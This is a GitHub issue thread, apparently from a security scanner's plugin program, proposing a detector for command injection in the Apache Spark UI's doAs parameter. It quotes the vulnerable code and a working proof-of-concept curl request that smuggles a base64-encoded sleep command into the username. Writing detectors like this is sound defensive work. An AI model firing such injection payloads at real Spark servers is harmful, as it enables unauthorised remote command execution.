Closed maoning closed 5 months ago
Hi @maoning ,
I would like contribute to this PRP request. Can you assign it to me?
Hi @OccamsXor ,
Thank you for picking up this request! Please make sure the following items are completed before the plugin implementation:
Hi @maoning , @tooryx ,
I sent the PR regarding the vulnerable configuration to Security Testbeds repository. https://github.com/google/security-testbeds/pull/32
The Apache Spark UI has spark.acls.enable
configuration option which provides capability to modify the application according to user's permissions. When the config is true, the vulnerable versions of Spark will check the group membership of the user -which is passed in the ?doAs
parameter- using the vulnerable code below:
private def getUnixGroups(username: String): Set[String] = {
val cmdSeq = Seq("bash", "-c", "id -Gn " + username)
// we need to get rid of the trailing "\n" from the result of command execution
Utils.executeAndGetOutput(cmdSeq).stripLineEnd.split(" ").toSet
Utils.executeAndGetOutput(idPath :: "-Gn" :: username :: Nil).stripLineEnd.split(" ").toSet
}
}
Ref: https://github.com/apache/spark/pull/36315/files
Without proper controls, this method allows blind command injection in username
parameter, meaning the attacker is not able to see the output of the executed command.
Using the public PoC provided here we can observe the application delays the response 10 seconds:
❯ curl 'http://localhost:8080/?doAs=`echo%20%22c2xlZXAgMTAK%22%20|%20base64%20-d%20|%20bash`'
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
<title>Error 403 User `echo "c2xlZXAgMTAK" | base64 -d | bash` is not authorized to access this page.</title>
</head>
<body><h2>HTTP ERROR 403 User `echo "c2xlZXAgMTAK" | base64 -d | bash` is not authorized to access this page.</h2>
<table>
<tr><th>URI:</th><td>/</td></tr>
<tr><th>STATUS:</th><td>403</td></tr>
<tr><th>MESSAGE:</th><td>User `echo "c2xlZXAgMTAK" | base64 -d | bash` is not authorized to access this page.</td></tr>
<tr><th>SERVLET:</th><td>org.apache.spark.ui.JettyUtils$$anon$1-4ef7e640</td></tr>
</table>
<hr><a href="https://eclipse.org/jetty">Powered by Jetty:// 9.4.36.v20210114</a><hr/>
</body>
</html>
We can also observe the sleep command is executed in the container:
The plugin will have these working steps:
?doAs
endpoint is returning 403 as expected BLIND_RCE
typeHi @OccamsXor,
Thank you for submitting the testing configs to security-testbeds and providing detailed vuln research. Everything looks good. Please submit our participation form and you can start working on the development.
Hi @OccamsXor,
Your PR has been merged. This usually means a reward will be granted. Google will start the internal QC process and the reward amount will be determined based on the quality of the detector report. Please be patient and allow up to a week for the QC process to finish. You'll be notified once the decision is made.
Thanks!
Are there any updates on this issue @magl0 @maoning ?
Hi @OccamsXor,
Thanks for your contribution, the reward has been granted!
https://github.com/projectdiscovery/nuclei-templates/blob/b686b1aea279093c30b35486db65a0e9917b66c4/http/cves/2022/CVE-2022-33891.yaml#L4
Please use Tsunami's payload generator like https://github.com/google/tsunami-security-scanner-plugins/blob/ab5e8d213fb7975223af338d2fefee6040d2e6ad/google/detectors/rce/ai/cve20236019/src/main/java/com/google/tsunami/plugins/cve20236019/Cve20236019Detector.java#L130-L139 to generate a templated printf string for verification.
Please read the rules of engagement first at https://github.com/google/tsunami-security-scanner-plugins/issues/409.